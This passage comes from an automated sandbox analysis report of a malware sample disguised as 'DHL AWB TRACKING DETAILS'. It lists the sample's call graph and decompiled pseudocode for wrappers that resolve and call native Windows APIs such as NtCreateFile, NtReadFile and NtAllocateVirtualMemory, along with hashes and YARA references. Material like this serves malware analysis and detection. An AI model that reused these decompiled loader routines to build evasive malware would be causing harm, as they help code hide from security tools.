32759->32760 32761 41adf6 32760->32761 32762 41ac30 LdrLoadDll 32761->32762 32763 41adff 32762->32763 32764 41ac30 LdrLoadDll 32763->32764 32765 41ae08 32764->32765 32766 41ac30 LdrLoadDll 32765->32766 32767 41ae11 32766->32767 32768 41ac30 LdrLoadDll 32767->32768 32769 41ae1a 32768->32769 32770 41ac30 LdrLoadDll 32769->32770 32771 41ae23 32770->32771 32772 41ac30 LdrLoadDll 32771->32772 32773 41ae2f 32772->32773 32774 41ac30 LdrLoadDll 32773->32774 32775 41ae38 32774->32775 32776 41ac30 LdrLoadDll 32775->32776 32777 41ae41 32776->32777 32778 41ac30 LdrLoadDll 32777->32778 32779 41ae4a 32778->32779 32780 41ac30 LdrLoadDll 32779->32780 32781 41ae53 32780->32781 32782 41ac30 LdrLoadDll 32781->32782 32783 41ae5c 32782->32783 32784 41ac30 LdrLoadDll 32783->32784 32785 41ae68 32784->32785 32786 41ac30 LdrLoadDll 32785->32786 32787 41ae71 32786->32787 32788 41ac30 LdrLoadDll 32787->32788 32789 41ae7a 32788->32789 32790 41ac30 LdrLoadDll 32789->32790 32791 41ae83 32790->32791 32792 41ac30 LdrLoadDll 32791->32792 32793 41ae8c 32792->32793 32794 41ac30 LdrLoadDll 32793->32794 32795 41ae95 32794->32795 32796 41ac30 LdrLoadDll 32795->32796 32797 41aea1 32796->32797 32798 41ac30 LdrLoadDll 32797->32798 32799 41aeaa 32798->32799 32800 41ac30 LdrLoadDll 32799->32800 32801 41aeb3 32800->32801 32802 41ac30 LdrLoadDll 32801->32802 32803 41aebc 32802->32803 32804 41ac30 LdrLoadDll 32803->32804 32805 41aec5 32804->32805 32806 41ac30 LdrLoadDll 32805->32806 32807 41aece 32806->32807 32808 41ac30 LdrLoadDll 32807->32808 32809 41aeda 32808->32809 32810 41ac30 LdrLoadDll 32809->32810 32811 41aee3 32810->32811 32812 41ac30 LdrLoadDll 32811->32812 32813 41aeec 32812->32813 32813->32599 32815 41af60 LdrLoadDll 32814->32815 32816 419edc 32815->32816 32845 a49860 LdrInitializeThunk 32816->32845 32817 419ef3 32817->32519 32819->32596 32821 41af60 LdrLoadDll 32820->32821 32822 41a55c NtAllocateVirtualMemory 32821->32822 32822->32699 32824 41cf40 32823->32824 32825 41cf46 32823->32825 32824->32704 32826 41bf90 2 API calls 32825->32826 32827 41cf6c 32826->32827 32827->32704 32829 41cff5 32828->32829 32830 41d02d 32828->32830 32831 41bf90 2 API calls 32829->32831 32830->32708 32832 41d00a 32831->32832 32833 41bdc0 2 API calls 32832->32833 32833->32830 32834->32715 32835->32717 32836->32719 32837->32722 32838->32724 32840 41ac4b 32839->32840 32841 414e50 LdrLoadDll 32840->32841 32842 41ac6b 32841->32842 32843 414e50 LdrLoadDll 32842->32843 32844 41ad17 32842->32844 32843->32844 32844->32739 32844->32844 32845->32817 32847 a49681 32846->32847 32848 a4968f LdrInitializeThunk 32846->32848 32847->32605 32848->32605 32850 41af60 LdrLoadDll 32849->32850 32851 41a68c RtlFreeHeap 32850->32851 32851->32609 32853 407eb0 32852->32853 32854 407eab 32852->32854 32855 41bd40 2 API calls 32853->32855 32854->32527 32858 407ed5 32855->32858 32856 407f38 32856->32527 32857 419ec0 2 API calls 32857->32858 32858->32856 32858->32857 32860 407f3e 32858->32860 32863 41bd40 2 API calls 32858->32863 32868 41a5c0 32858->32868 32861 407f64 32860->32861 32862 41a5c0 2 API calls 32860->32862 32861->32527 32864 407f55 32862->32864 32863->32858 32864->32527 32866 40817e 32865->32866 32867 41a5c0 2 API calls 32865->32867 32866->32488 32867->32866 32869 41af60 LdrLoadDll 32868->32869 32870 41a5dc 32869->32870 32873 a496e0 LdrInitializeThunk 32870->32873 32871 41a5f3 32871->32858 32873->32871 32875 41b5c3 32874->32875 32878 40acf0 32875->32878 32879 40ad14 32878->32879 32880 40ad50 LdrLoadDll 32879->32880 32881 409c4a 32879->32881 32880->32881 32881->32494 32883 40b063 32882->32883 32885 40b0e0 32883->32885 32898 419c90 LdrLoadDll 32883->32898 32885->32501 32887 41af60 LdrLoadDll 32886->32887 32888 40f1bb 32887->32888 32888->32504 32889 41a7d0 32888->32889 32890 41a7d3 32889->32890 32891 41af60 LdrLoadDll 32890->32891 32892 41a7ef LookupPrivilegeValueW 32891->32892 32892->32506 32894 41af60 LdrLoadDll 32893->32894 32895 41a27c 32894->32895 32899 a49910 LdrInitializeThunk 32895->32899 32896 41a29b 32896->32507 32898->32885 32899->32896 32901 40b1f0 32900->32901 32902 40b040 LdrLoadDll 32901->32902 32903 40b204 32902->32903 32903->32443 32905 40ae51 32904->32905 32906 40ae4d 32904->32906 32907 40ae6a 32905->32907 32908 40ae9c 32905->32908 32906->32446 32950 419cd0 LdrLoadDll 32907->32950 32951 419cd0 LdrLoadDll 32908->32951 32910 40aead 32910->32446 32912 40ae8c 32912->32446 32914 40f4a0 3 API calls 32913->32914 32915 4143c6 32913->32915 32914->32915 32915->32448 32917 408a79 32916->32917 32952 4087a0 32916->32952 32919 408a9d 32917->32919 32920 4087a0 19 API calls 32917->32920 32919->32450 32921 408a8a 32920->32921 32921->32919 32970 40f710 10 API calls 32921->32970 32924 41af60 LdrLoadDll 32923->32924 32925 41a51c 32924->32925 33089 a498f0 LdrInitializeThunk 32925->33089 32926 40c322 32928 40f4a0 32926->32928 32929 40f4bd 32928->32929 33090 419fc0 32929->33090 32932 40f505 32932->32454 32933 41a010 2 API calls 32934 40f52e 32933->32934 32934->32454 32936 41af60 LdrLoadDll 32935->32936 32937 41a02c 32936->32937 33096 a49780 LdrInitializeThunk 32937->33096 32938 40c385 32938->32460 32938->32463 32941 41af60 LdrLoadDll 32940->32941 32942 41a07c 32941->32942 33097 a497a0 LdrInitializeThunk 32942->33097 32943 40c459 32943->32471 32946 41af60 LdrLoadDll 32945->32946 32947 419e3c 32946->32947 33098 a49a20 LdrInitializeThunk 32947->33098 32948 40c4ac 32948->32475 32950->32912 32951->32910 32953 407ea0 4 API calls 32952->32953 32967 4087ba 32953->32967 32954 408a49 32954->32917 32955 408a3f 32956 408160 2 API calls 32955->32956 32956->32954 32959 419f00 2 API calls 32959->32967 32963 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 32963->32967 32966 419e20 2 API calls 32966->32967 32967->32954 32967->32955 32967->32959 32967->32963 32967->32966 32968 41a490 LdrLoadDll NtClose 32967->32968 32971 419d10 32967->32971 32974 4085d0 32967->32974 32986 40f5f0 LdrLoadDll NtClose 32967->32986 32987 419d90 LdrLoadDll 32967->32987 32988 419dc0 LdrLoadDll 32967->32988 32989 419e50 LdrLoadDll 32967->32989 32990 4083a0 32967->32990 33006 405f60 LdrLoadDll 32967->33006 32968->32967 32970->32919 32972 419d2c 32971->32972 32973 41af60 LdrLoadDll 32971->32973 32972->32967 32973->32972 32975 4085e6 32974->32975 33007 419880 32975->33007 32977 4085ff 32978 408771 32977->32978 33028 4081a0 32977->33028 32978->32967 32980 4086e5 32980->32978 32981 4083a0 11 API calls 32980->32981 32982 408713 32981->32982 32982->32978 32983 419f00 2 API calls 32982->32983 32984 408748 32983->32984 32984->32978 32985 41a500 2 API calls 32984->32985 32985->32978 32986->32967 32987->32967 32988->32967 32989->32967 32991 4083c9 32990->32991 33068 408310 32991->33068 32994 41a500 2 API calls 32995 4083dc 32994->32995 32995->32994 32996 408467 32995->32996 32998 408462 32995->32998 33076 40f670 32995->33076 32996->32967 32997 41a490 2 API calls 32999 40849a 32997->32999 32998->32997 32999->32996 33000 419d10 LdrLoadDll 32999->33000 33001 4084ff 33000->33001 33001->32996 33080 419d50 33001->33080 33003 408563 33003->32996 33004 414a50 8 API calls 33003->33004 33005 4085b8 33004->33005 33005->32967 33006->32967 33008 41bf90 2 API calls 33007->33008 33009 419897 33008->33009 33035 409310 33009->33035 33011 4198b2 33012 4198f0 33011->33012 33013 4198d9 33011->33013 33016 41bd40 2 API calls 33012->33016 33014 41bdc0 2 API calls 33013->33014 33015 4198e6 33014->33015 33015->32977 33017 41992a 33016->33017 33018 41bd40 2 API calls 33017->33018 33019 419943 33018->33019 33025 419be4 33019->33025 33041 41bd80 33019->33041 33022 419bd0 33023 41bdc0 2 API calls 33022->33023 33024 419bda 33023->33024 33024->32977 33026 41bdc0 2 API calls 33025->33026 33027 419c39 33026->33027 33027->32977 33029 40829f 33028->33029 33030 4081b5 33028->33030 33029->32980 33030->33029 33031 414a50 8 API calls 33030->33031 33032 408222 33031->33032 33033 41bdc0 2 API calls 33032->33033 33034 408249 33032->33034 33033->33034 33034->32980 33036 409335 33035->33036 33037 40acf0 LdrLoadDll 33036->33037 33038 409368 33037->33038 33040 40938d 33038->33040 33044 40cf20 33038->33044 33040->33011 33062 41a580 33041->33062 33045 40cf4c 33044->33045 33046 41a1e0 LdrLoadDll 33045->33046 33047 40cf65 33046->33047 33048 40cf6c 33047->33048 33055 41a220 33047->33055 33048->33040 33052 40cfa7 33053 41a490 2 API calls 33052->33053 33054 40cfca 33053->33054 33054->33040 33056 41af60 LdrLoadDll 33055->33056 33057 41a23c 33056->33057 33061 a49710 LdrInitializeThunk 33057->33061 33058 40cf8f 33058->33048 33060 41a810 LdrLoadDll 33058->33060 33060->33052 33061->33058 33063 41af60 LdrLoadDll 33062->33063 33064 41a59c 33063->33064 33067 a49a00 LdrInitializeThunk 33064->33067 33065 419bc9 33065->33022 33065->33025 33067->33065 33069 408328 33068->33069 33070 40acf0 LdrLoadDll 33069->33070 33071 408343 33070->33071 33072 414e50 LdrLoadDll 33071->33072 33073 408353 33072->33073 33074 40835c PostThreadMessageW 33073->33074 33075 408370 33073->33075 33074->33075 33075->32995 33077 40f683 33076->33077 33083 419e90 33077->33083 33081 419d6c 33080->33081 33082 41af60 LdrLoadDll 33080->33082 33081->33003 33082->33081 33084 41af60 LdrLoadDll 33083->33084 33085 419eac 33084->33085 33088 a49840 LdrInitializeThunk 33085->33088 33086 40f6ae 33086->32995 33088->33086 33089->32926 33091 41af60 LdrLoadDll 33090->33091 33092 419fdc 33091->33092 33095 a499a0 LdrInitializeThunk 33092->33095 33093 40f4fe 33093->32932 33093->32933 33095->33093 33096->32938 33097->32943 33098->32948 33101 a49540 LdrInitializeThunk

                    Executed Functions

                    Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
                    C-Code - Quality: 37%
                    			E0041A40A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t21;
				void* _t30;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				_t16 = _a4;
				_t32 = _a4 + 0xc48;
				E0041AF60(_t30, _t16, _t32,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t21 =  *((intOrPtr*)( *_t32))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t31, _t34); // executed
				return _t21;
			}








                    0x0041a413
                    0x0041a41f
                    0x0041a427
                    0x0041a42c
                    0x0041a432
                    0x0041a44d
                    0x0041a455
                    0x0041a459

                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: 6f3bbb242c56fe18ca81c1544d15f7c1d6522fee8eecbdcd7e4e071b46f430e3
                    • Instruction ID: 160008e4773b1b80f1a6a88fe42ab6d3d0e4feea498ae17a6bcea7275b4de0a4
                    • Opcode Fuzzy Hash: 6f3bbb242c56fe18ca81c1544d15f7c1d6522fee8eecbdcd7e4e071b46f430e3
                    • Instruction Fuzzy Hash: A5F0F9B6200108AFCB04DF89CC90DEB77A9EF8C754F158248FE1D97241D630E811CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
                    C-Code - Quality: 37%
                    			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                    0x0041a413
                    0x0041a41f
                    0x0041a427
                    0x0041a42c
                    0x0041a432
                    0x0041a44d
                    0x0041a455
                    0x0041a459

                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 219 40acf0-40ad0c 220 40ad14-40ad19 219->220 221 40ad0f call 41cc50 219->221 222 40ad1b-40ad1e 220->222 223 40ad1f-40ad2d call 41d070 220->223 221->220 226 40ad3d-40ad4e call 41b4a0 223->226 227 40ad2f-40ad3a call 41d2f0 223->227 232 40ad50-40ad64 LdrLoadDll 226->232 233 40ad67-40ad6a 226->233 227->226 232->233
                    C-Code - Quality: 100%
                    			E0040ACF0(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B4A0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                    0x0040ad0c
                    0x0040ad0f
                    0x0040ad14
                    0x0040ad19
                    0x0040ad23
                    0x0040ad28
                    0x0040ad2b
                    0x0040ad2d
                    0x0040ad35
                    0x0040ad3a
                    0x0040ad3a
                    0x0040ad41
                    0x0040ad49
                    0x0040ad4c
                    0x0040ad4e
                    0x0040ad62
                    0x00000000
                    0x0040ad64
                    0x0040ad6a
                    0x0040ad1e
                    0x0040ad1e
                    0x0040ad1e

                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A35B Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 234 41a35b-41a3b1 call 41af60 NtCreateFile
                    C-Code - Quality: 64%
                    			E0041A35B(intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
				long _t21;
				void* _t31;

				asm("cli");
				asm("adc [esi-0x1374aab4], ah");
				_t15 = _a8;
				_t3 = _t15 + 0xc40; // 0xc40
				E0041AF60(_t31, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t21;
			}





                    0x0041a35c
                    0x0041a35d
                    0x0041a363
                    0x0041a36f
                    0x0041a377
                    0x0041a3ad
                    0x0041a3b1

                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 3d36fa00f0c0e38b1d16cf1d2e8ad0b499f91c4f865e0299559f20ee5fe15f9b
                    • Instruction ID: 65097f47c13a115ffb2d056c85b6b46217a9acb7e54f30f5b6aee2cd057f8071
                    • Opcode Fuzzy Hash: 3d36fa00f0c0e38b1d16cf1d2e8ad0b499f91c4f865e0299559f20ee5fe15f9b
                    • Instruction Fuzzy Hash: 9501C9B2205108AFDB58CF98DC85DEB77A9EF8C754F15824DFA4D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 237 41a360-41a376 238 41a37c-41a3b1 NtCreateFile 237->238 239 41a377 call 41af60 237->239 239->238
                    C-Code - Quality: 100%
                    			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                    0x0041a36f
                    0x0041a377
                    0x0041a3ad
                    0x0041a3b1

                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A53A Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 240 41a53a-41a556 241 41a55c-41a57d NtAllocateVirtualMemory 240->241 242 41a557 call 41af60 240->242 242->241
                    C-Code - Quality: 72%
                    			E0041A53A(void* __ecx, signed int __edx, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t16;
				signed int _t22;
				void* _t26;
				intOrPtr _t30;

				_t22 = __edx ^  *(__ecx - 0x35);
				_push(_t22);
				 *((intOrPtr*)(_t22 + 0x55)) = _t30;
				_push(_t30);
				_t12 = _v0;
				_t5 = _t12 + 0xc60; // 0xca0
				E0041AF60(_t26, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t16;
			}








                    0x0041a53a
                    0x0041a53d
                    0x0041a53e
                    0x0041a540
                    0x0041a543
                    0x0041a54f
                    0x0041a557
                    0x0041a579
                    0x0041a57d

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: 1b1e39ae1400efc95cc6fb6f20ece6d437dd9711870a2dc52d3c1bdff3ada499
                    • Instruction ID: db8d58c09434d50f862041ea2255eacf7e3858e8d10e0ff27327ab981fd82e52
                    • Opcode Fuzzy Hash: 1b1e39ae1400efc95cc6fb6f20ece6d437dd9711870a2dc52d3c1bdff3ada499
                    • Instruction Fuzzy Hash: 5AF0D4B6200208AFDB14DF89CC81EABB7A9EF8C754F158149BA0997241C635E811CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 243 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                    C-Code - Quality: 100%
                    			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                    0x0041a54f
                    0x0041a557
                    0x0041a579
                    0x0041a57d

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041A490(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                    0x0041a493
                    0x0041a496
                    0x0041a49f
                    0x0041a4a7
                    0x0041a4b5
                    0x0041a4b9

                    APIs
                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A498F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 6064978d5b080e1ac775bfc0465342ed2542abf0c7954ff6afefc78c22a72080
                    • Instruction ID: 3679f56db154f20b125b2ee624a088cf27215c8a369a8f6811c3a0c659b85df9
                    • Opcode Fuzzy Hash: 6064978d5b080e1ac775bfc0465342ed2542abf0c7954ff6afefc78c22a72080
                    • Instruction Fuzzy Hash: 3990026160100503D21271694404616000AE7D0382F91C032A5014555ECA7589D6F171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: faa097405b0419847c69ad85ac6349b67c135c29094579ef36bbcf15086a3347
                    • Instruction ID: 21c54deca697b2ded1517e8e1738f7315810da786e900ad234c2aa2cb91c91dc
                    • Opcode Fuzzy Hash: faa097405b0419847c69ad85ac6349b67c135c29094579ef36bbcf15086a3347
                    • Instruction Fuzzy Hash: DA90027120100413D222616945047070009E7D0382F91C422A4414558D96A68996F161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00A49840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
